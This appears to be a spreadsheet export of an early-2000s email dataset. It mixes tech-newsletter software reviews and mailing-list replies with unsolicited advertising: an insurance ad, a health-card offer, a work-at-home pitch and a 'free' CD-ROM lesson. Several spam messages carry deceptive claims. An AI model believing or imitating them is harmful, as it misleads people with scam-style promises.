 &lt;a class="URL" href="http://hp.vector.co.jp/authors/VA014830/english/FlexRena/"&gt;http://hp.vector.co.jp/authors/VA014830/english/FlexRena/&lt;/a&gt;
 &lt;p&gt;
 {Rename your files} I work with a lot of files throughout the day,
 and sometimes I end up with a desktop cluttered with useless
 copies and shortcuts - and you KNOW how I feel about clutter. I
 don't need a reminder that there are five shortcuts or six copies
 of something on my desktop... and that is where Flexible Renamer
 comes into the picture. With Flexible Renamer, I can cut off the
 "Shortcut to" and "Copy of" prefixes from all my files, making
 them a lot easier to read. That's not all though... you can even
 make a .txt file on your desktop into a .doc document in seconds.
 If you don't like your filename in all caps, then just switch them
 to lower case and vice-versa. The possibilities are endless! (You
 know, I always wanted to change my own name from "Chris" to
 "Caspian Wildflowers"...)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&lt;b&gt;Disk Investigator v1.1 [527k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.theabsolute.net/sware/dskinv.html"&gt;http://www.theabsolute.net/sware/dskinv.html&lt;/a&gt;
 &lt;p&gt;
 {Restore deleted files} Have you ever deleted a file from your PC,
 realizing later that you actually needed it? Yeah, me too. Best-
 case scenario, I would just go to the Recycle Bin and retrieve my
 deleted file. But what if I had already emptied the Recycle Bin?
 (Horrors!) Luckily, Disk Investigator can come into play and save
 the day. (Yay!) With Disk Investigator, I can view deleted files
 or directories, and restore them if necessary. I no longer have to
 wonder if I fully deleted a troublesome file... I just load up
 Disk Investigator, and I'll know if the file is gone (with 100%
 certainty)!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&lt;b&gt;Actual Title Buttons 1.3 [1.0M] W9x/2k/XP $19.95&lt;/b&gt;&lt;BR&gt;
     Unearthed by Michael Tretyakov
 &lt;p&gt;
 &lt;a class="URL" href="http://www.actualtools.com/"&gt;http://www.actualtools.com/&lt;/a&gt;
 &lt;p&gt;
 {Windows Explorer add-on} "Actual Title Buttons lets you add the
 new Minimize To Tray and Stay On Top buttons to any program's
 title bar next to the Windows standard Minimize/Maximize/Close
 buttons." This program is a must for anyone who wants to avoid the
 distractions of other windows popping up over your active windows.
 While writing this review, I am using the "Stay On Top" command
 for Notepad, and during this time I have already received five
 instant messages. Why is this important? Normally these messages
 would pop up in front of Notepad and disrupt my work... but with
 Actual Title Buttons, I can keep typing without missing those
 "important" instant messages. The only difference is that they
 aren't an annoyance now. The "Minimize To Tray" feature is great,
 too, because freeing up taskbar space is a beautiful thing...
 especially when you don't have to close down your programs to do
 it.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
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;&lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, a Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Electricon Land&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.electriconland.com/"&gt;http://www.electriconland.com/&lt;/a&gt;
 &lt;p&gt;
 {Icons for your machine} Gretchen and I are really looking forward
 to moving to our new neighborhood in a little over a month.
 Everything is better with a little dash of friendliness, right?
 Icons are no exception. All the action on this website is based
 around a city block of Electriconland. You walk into different
 stores to get different pixel art icons. Walk into Gabu's Pub and
 you will find icons in the likeness of Pink Floyd. You won't be
 disappointed when you go around the corner and pick up your
 Avengers icons from the comic store. If all this wasn't good
 enough then maybe this fact alone will send you to the street of
 Electriconland... all the icons are cross platform. This means you
 can have your new favorite icons on your Windows, Mac, and Linux
 machine, or maybe even a different one on each. The possibilities
 are endless!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I just hate it when I try to install a program and the
 installation fails. I hate it even more when the program doesn't
 leave a log file to help me track down the problem. Some would say
 I am out of luck, but as long as the program uses Windows
 Installer, then I am on Cloud Nine. Why am I so happy? Because for
 any program that uses Windows Installer, I can turn on logging
 through the Registry. Navigate to HKEY_LOCAL_MACHINE \ Software \
 Policies \ Microsoft \ Windows \ Installer. Add a new String
 value, double-click it, and enter the following Value data:
 "voicewarmup" (sans quotes). These letters can be entered in any
 order: v = Verbose output; o = Out- of-disk-space messages; i =
 Status messages; c = Initial UI parameters; e = All error
 messages; w = Non-fatal warnings; a = Start up of actions; r =
 Action-specific records; m = Out-of- memory or fatal exit
 information; u = User requests; p = Terminal properties. If you
 add a plus, the existing file will be appended. If you add an
 exclamation mark, each line is flushed. Now, when something fails,
 I just have to check in the "Temp" directory and look for my log
 files. They'll vary in name, but will always start with "Msi" and
 end with the .LOG extension. As always, make sure to backup your
 registry before making any modifications.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href="http://www.lockergnome.com/issues/daily/20020716.html"&gt;http://www.lockergnome.com/issues/daily/20020716.html&lt;/a&gt;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Dignity Shakedown --&gt;
 A hamburger by any other name ordinarily costs about twice as much.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Elite Equity Indexed U.L. Policy
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C23E2C.44242DA0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Vista Elite - The Equity Indexed UL Policy
  with 100% Participation for the Life of the Contract!	
  Interest Crediting Strategies
 Basic Interest Strategy	 
 Five-Year Fixed-Term Interest Strategy	 
 Five-Year Equity Indexed Strategy	 
 Interest Crediting Strategy Linked to the S&amp;P 500*	 
 5 &amp; 15 Year No Lapse Guarantee**
 High Commissionable Targets	 
 Designed for Cash Accumulation	 
 100% participation rate guaranteed for the life of the contract! 	
 For more information, call or e-mail
 &lt;mailto:sherry.kancs@indianapolislife.com&gt;  us today!
  800-831-4380
 ? or ?
 Please fill out the form below for more information	 
 Name:	 	 
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	  	
  Indianapolis Life - an Amerus Company
 *"Standard &amp; Poor's", "S&amp;P", "S&amp;P 500" and "Standard and Poor's 500" are
 trademarks of The McGraw-Hill Companies, Inc. and have been licensed for
 use by Indianapolis Life Insurance Company. Indianapolis Life's EIL
 products are not sponsored, endorsed, sold or promoted by Standard &amp;
 Poor's, and Standard &amp; Poor's makes no representation regarding the
 advisability of purchasing these products. **May not be available in all
 states. For Broker Use Only. Not For Use With General Public.
 CNIL0140-0702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------=_NextPart_000_0007_01C23E2C.44242DA0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The Elite Equity Indexed U.L. Policy&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" border=3D"1" =
 bordercolor=3D"#000000"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/indy/1/20020610-101a.jpg" =
 alt=3D"Vista Elite - The Equity Indexed UL Policy" width=3D"550" =
 height=3D"94"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/indy/1/20020610-102a.jpg" =
 width=3D"550" height=3D"161"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/indy/1/20020610-103a.jpg" =
 alt=3D"with 100% Participation for the Life of the Contract!" =
 width=3D"550" height=3D"54"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/indy/1/20020610-2.gif" =
 width=3D"347" height=3D"40" alt=3D"Interest Crediting Strategies"&gt;&lt;br&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td rowspan=3D"7" align=3D"right" width=3D"21%"&gt;&lt;img =
 src=3D"http://iiq.us/images/indy/1/20020610-3.gif" width=3D"20" =
 height=3D"175"&gt;&lt;/td&gt;
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;&lt;img src=3D"http://iiq.us/images/indy/1/spacer.gif" =
 width=3D"1" height=3D"3"&gt;&lt;br&gt;Basic Interest Strategy&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Five-Year Fixed-Term Interest Strategy&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Five-Year Equity Indexed Strategy&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Interest Crediting Strategy Linked to the S&amp;amp;P =
 500*&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;5 &amp;amp; 15 Year No Lapse Guarantee**&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;High Commissionable Targets&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"79%" valign=3D"bottom"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Designed for Cash Accumulation&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font size=3D"4" face=3D"Times New Roman, Times, =
 serif"&gt;100% participation rate guaranteed for the life of the =
 contract!&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;For more information, call or &lt;a =
 href=3D"mailto:sherry.kancs@indianapolislife.com"&gt;e-mail&lt;/a&gt;=20
             us today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/indy/1/20020610-4.gif" =
 width=3D"535" height=3D"91" alt=3D"800-831-4380"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;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colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"sherry.kancs@indianapolislife.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Indianapolis Life Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/indy/1/20020610-5.gif" =
 width=3D"247" height=3D"60" alt=3D"Indianapolis Life - an Amerus =
 Company"&gt;=20
             &lt;br&gt;
             &lt;p align=3D"left"&gt;&lt;font size=3D"1"&gt;*&amp;quot;Standard &amp;amp; =
 Poor's&amp;quot;,=20
               &amp;quot;S&amp;amp;P&amp;quot;, &amp;quot;S&amp;amp;P 500&amp;quot; and =
 &amp;quot;Standard=20
               and Poor's 500&amp;quot; are trademarks of The McGraw-Hill =
 Companies,=20
               Inc. and have been licensed for use by Indianapolis Life =
 Insurance=20
               Company. Indianapolis Life's EIL products are not =
 sponsored, endorsed,=20
               sold or promoted by Standard &amp;amp; Poor's, and Standard =
 &amp;amp; Poor's=20
               makes no representation regarding the advisability of =
 purchasing=20
               these products. **May not be available in all states. For =
 Broker=20
               Use Only. Not For Use With General Public.&lt;br&gt;
               CNIL0140-0702 &lt;/font&gt;&lt;/p&gt;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size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C23E2C.44242DA0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tell Me Where to Send Your Health Card
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Tell Me Where to Send Your Health Card&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;&lt;img src=http://www.ahahealth.com/images/1x1pixel_white.gif?q=9G001"&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;font face="arial" size=1&gt;You requested to receive this mailing, by registering at Send Great Offers.&lt;/font&gt;
 &lt;table width="611" bordercolor="#000099" border="3"&gt;
   &lt;tr&gt;
     &lt;td height="571" valign="top" bordercolor="#FFFFFF"&gt;
       &lt;table width="611" height="483"&gt;
         &lt;tr&gt;
           &lt;td width="" height="202"&gt;&lt;img border="0" src="http://www.ahahealth.com/assoc/images/E6/E6_D_ladydoc.jpg" width="167" height="200"&gt;&lt;/td&gt;
           &lt;td width="" height="202"&gt;
             &lt;p&gt;&lt;img border="0" src="http://www.ahahealth.com/assoc/images/E6/E6_D_SAMTOTE_06.gif" width="355" height="78"&gt;&lt;/p&gt;
            I'm your Healthy Advantage&lt;sup&gt;&lt;font size="-2"&gt;SM&lt;/font&gt;&lt;/sup&gt;
               &lt;b&gt;PERSONAL ADVOCATE. &lt;/b&gt;I'm &lt;br&gt;
               available 24 hours a day, 7 days a week to help you with insurance&lt;br&gt;
               claims, finding a specialist, helping you cut through red tape.
             &lt;table width="85%"&gt;
               &lt;tr&gt;
                 &lt;td&gt;
                   &lt;div align="left"&gt;&lt;img border="0" src="http://www.ahahealth.com/assoc/images/E6/E6_D_SAMTOTE_14.gif" width="345" height="38"&gt;&lt;/div&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;b&gt;&lt;font color="#CC0000"&gt;
             &lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRHLSSUAMYVX&amp;ext=1"&gt;
             FREE&lt;/font&gt; for one full month&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td width="" height="98"&gt; &lt;/td&gt;
           &lt;td width="" height="98" valign="top"&gt;
             &lt;ul&gt;
               &lt;li&gt;&lt;b&gt;30% off &lt;/b&gt;doctor visits and medical care&lt;/li&gt;
               &lt;li&gt;&lt;b&gt;50% off&lt;/b&gt; dental care&lt;/li&gt;
               &lt;li&gt;&lt;b&gt;50% off&lt;/b&gt; prescription drugs&lt;/li&gt;
               &lt;li&gt;&lt;b&gt;No commitments.&lt;/b&gt; No hassles.&lt;/li&gt;
               &lt;li&gt;&lt;b&gt;AND&lt;/b&gt; &lt;font color="#CC0000"&gt;&lt;b&gt;MUCH MORE!&lt;br&gt;
                 &lt;font color="#000000"&gt;Best of all,&lt;b&gt; you cannot be turned down.&lt;/b&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
             &lt;/ul&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td colspan="2" height="202"&gt;
             &lt;table width="100%"&gt;
               &lt;tr&gt;
                 &lt;td width="69%" height="72" valign="middle"&gt;
                   &lt;p&gt;&lt;b&gt;&lt;font color="#000000"&gt;&lt;/font&gt;&lt;font color="#CC0000"&gt;SPECIAL
                     BONUS OFFER:&lt;/font&gt;&lt;/b&gt; Get a &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt;
                     &lt;b&gt;Samsonite Tote&lt;/b&gt; (with accompanying &lt;b&gt;Cosmetic Case&lt;/b&gt;) and &lt;b&gt;10-Piece
                     Manicure Set&lt;/b&gt;. Yours to keep FREE with your
                     &lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRHLSSUAMYVX&amp;ext=1"&gt;
                     FREE Trial Membership&lt;/a&gt;
                     in Healthy Advantage.&lt;/p&gt;
                   &lt;p&gt; &lt;/p&gt;
                 &lt;/td&gt;
                 &lt;td width="" height="72"&gt;
                   &lt;div align="left"&gt;
                   &lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRHLSSUAMYVX&amp;ext=1"&gt;
                   &lt;img border="0" src="http://www.ahahealth.com/assoc/images/E6/E6_D_Totes135.gif" width="200" height="135"&gt;&lt;/a&gt;&lt;/div&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;
                 &lt;td width="" height="59"&gt;
                   &lt;div align="center"&gt;
                   &lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRHLSSUAMYVX&amp;ext=1"&gt;
                   &lt;img border="0" src="http://www.ahahealth.com/assoc/images/E6/E6_D_SAMTOTE_24.gif" width="278" height="85"&gt;&lt;/a&gt;&lt;/div&gt;
                 &lt;/td&gt;
                 &lt;td width="" height="59"&gt;
                 &lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRHLSSUAMYVX&amp;ext=1"&gt;
                 &lt;img border="0" src="http://www.ahahealth.com/assoc/images/E6/E6_D_SAMTOTE_.gif" width="154" height="85"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;tr&gt;
   	&lt;TD cellpadding="5" vAlign=top width="97%" bgColor=#f8f0ff height=38&gt;
 	      &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana size=1&gt;NO SPAM POLICY&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Verdana size=1&gt;
 	      &lt;BR&gt;Your privacy is important to us. You received this message because you have agreed to
 	      receive offers from Send Great Offers or one of our
 	      carefully selected marketing partners. &lt;BR&gt;We abide by a no spam policy.
 	      If you believe that you are receiving this message in error or would no
 	      longer like to receive email from Send Great Offers,
 	      please click on the link below.&lt;/FONT&gt;&lt;/P&gt;
 	&lt;/TD&gt;
    &lt;/TR&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=XRHLSSUAMYVX"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</si>
  <si>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WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 8064owaS8-626pYyF6611Pnah5-739Lind4606qvym4-041dhmY3817l52
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: THIS IS A FREE OFFER!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-08 at 12:18, Dave Wilson wrote:
 &gt; Despite being one of Dijkstra's brain-damaged children who learned BASIC 
 &gt; at an early age :) I never use GOTO anymore (or any of its bastard 
 &gt; offspring like break, continue, fudged function calls with sleight of 
 &gt; hand in the variables). My code is longer than it might be if I had used 
 You don't use break? What about case statement blocks, or leaving a for
 or while loop when you know you're finished?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Comrade Communism (was Re: Crony Capitalism (was RE: sed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In a message dated 9/22/2002 11:38:01 PM, rah@shipwright.com writes:
 &gt;the *best* way to
 &gt;get on the Forbes 400 is
 historically: real estate
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: UK rich-b*st*rds TV alert
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., Rachel Carthy &lt;rachel@r...&gt; wrote:
 &gt; Apparently it has giant walking land squid in it! Unmissable!
 Yay! Prairie Squid!
 Rob
 or Admiral Ackbar?
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format.
 --______BoundaryOfDocument______
 Content-Type: text/plain
 Content-Transfer-Encoding: 7bit
 FREE CD-ROM LESSONS
 http://isis.webstakes.com/play/Isis?ID=89801
 - Choose from 15 titles
 - Learn new skills in 1 hour
 - Compare at $59.95
 - Quick, easy and FREE!
 Get FREE* computer learning from Video Professor on a subject of your
 choice.  For over 14 years, Video Professor has taught millions of people
 how to use their computers, and we can teach you too, FREE.
 Get Your FREE Lesson Today!
 http://isis.webstakes.com/play/Isis?ID=89801
 Simple 'What You See Is What You Get' way to learn
 - Plays like a video on your computer screen
 - A complete &amp; comprehensive lesson FREE &amp; RISK FREE
 - Over 3 million satisfied user
 Select from these titles available FREE...
 Windows, Outlook, Excel, Access, Powerpoint, FrontPage, Works, Quicken,
 Internet, Word, WordPerfect, Lotus 1-2-3, DOS
 Get Your FREE Lesson Today!
 http://isis.webstakes.com/play/Isis?ID=89801
 * You only pay $6.95 shipping and handling conveniently billed to your
 Visa, Mastercard, America Express or Discover Card. Windows compatible
 only. Some restrictions may apply.
 --------------------------------
 Webstakes.com - Where INSTANT WINNING happens daily!
 Webstakes.com Customer Service
 http://home.webstakes.com/play/HomePage?temp=2201&amp;tb_id=301
 http://www.webstakes.com
 This email was sent to ler@lerctr.org.
 You are receiving this email because you opted-in to 
 periodically receive emails with special offers from 
 Webstakes.com. If you'd  like to unsubscribe from 
 future emails, please see below.
 http://service.ivillage.com/Apps/DCS/mcp?r=7003B9351HUJs01200027c03B930mpHyWpHdh
 (If the above link does not work, please copy and 
 paste the entire  into your browser)
 --______BoundaryOfDocument______
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=iso-8859-1"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Untitled Document&lt;/TITLE&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
 &lt;STYLE type=text/css&gt;.copy {
 	FONT-FAMILY: "Times New Roman", Times, Georgia, serif; FONT-SIZE: 10pt; FONT-WEIGHT: normal; MARGIN-TOP: -20px; TEXT-ALIGN: left
 }
 .its {
 	FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; FONT-SIZE: 14pt; FONT-WEIGHT: bold; WORD-SPACING: -1px
 }
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;&lt;CENTER&gt;
 &lt;TABLE align=center border=0 cellPadding=0 cellSpacing=0 width=500&gt;
 &lt;TR&gt;
     &lt;TD colSpan=4&gt;
       &lt;P align=center&gt;&lt;A href="http://isis.webstakes.com/play/Isis?ID=89801"&gt;&lt;IMG 
       src="http://www3.videoprofessor.com/images/johncd.jpg"&gt;&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;BR&gt;
 &lt;TABLE align=center border=0 cellPadding=0 cellSpacing=0 width=500&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=235&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;&lt;IMG align=right height=89 hspace=2 
       src="http://www3.videoprofessor.com/images/family.jpg" vspace=2 
       width=150&gt;It&amp;#8217;s FAST!&lt;/SPAN&gt; You&amp;#8217;ll be up and running in an hour! Don&amp;#8217;t 
       waste time sifting through manuals, commuting to classes or seminars. Just 
       pop in the CD-ROM and you&amp;#8217;re learning!&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;It&amp;#8217;s EASY!&lt;/SPAN&gt; It&amp;#8217;s as simple as 
       1-2-3! Video Professor&amp;#8217;s straightforward &amp;#8220;What-You-See-Is-What-You-Do&amp;#8221; 
       approach makes learning as easy as watching TV!&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;It&amp;#8217;s CONVENIENT!&lt;/SPAN&gt; We&amp;#8217;re ready to 
       teach you day and night! With your busy schedule, you don&amp;#8217;t have time to 
       waste at classes or seminars. Don&amp;#8217;t fumble through boring manuals. 
       Whatever your schedule, we&amp;#8217;re ready when you are!&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;It&amp;#8217;s COMPLETE!&lt;/SPAN&gt; These aren&amp;#8217;t 
       short teaser lessons. Each 60-minute lesson takes you from installing the 
       software to more advanced skills. And they&amp;#8217;re not just for beginners! 
       We&amp;#8217;ll surprise you with the knowledge you&amp;#8217;ll gain!&lt;/SPAN&gt;&lt;BR&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=235&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;IMG height=3 src="http://www3.videoprofessor.com/images/black.gif" width="100%"&gt;&lt;BR&gt;&lt;IMG 
       height=10 src="http://www3.videoprofessor.com/images/white.gif" width=5&gt;&lt;SPAN class=its&gt;&lt;BR&gt;Why Am I Making This 
       Incredible Offer?&lt;/SPAN&gt;&lt;BR&gt;&lt;IMG height=10 src="http://www3.videoprofessor.com/images/white.gif" width=5&gt;&lt;SPAN 
       class=its&gt;&lt;/SPAN&gt;&lt;BR&gt;I&amp;#8217;m so confident that once you try my exceptional 
       &amp;#8220;What-You-See-Is-What-You-Do&amp;#8221; learning method, you&amp;#8217;ll turn to us for all 
       your computer learning needs.&lt;/SPAN&gt;&lt;/P&gt;
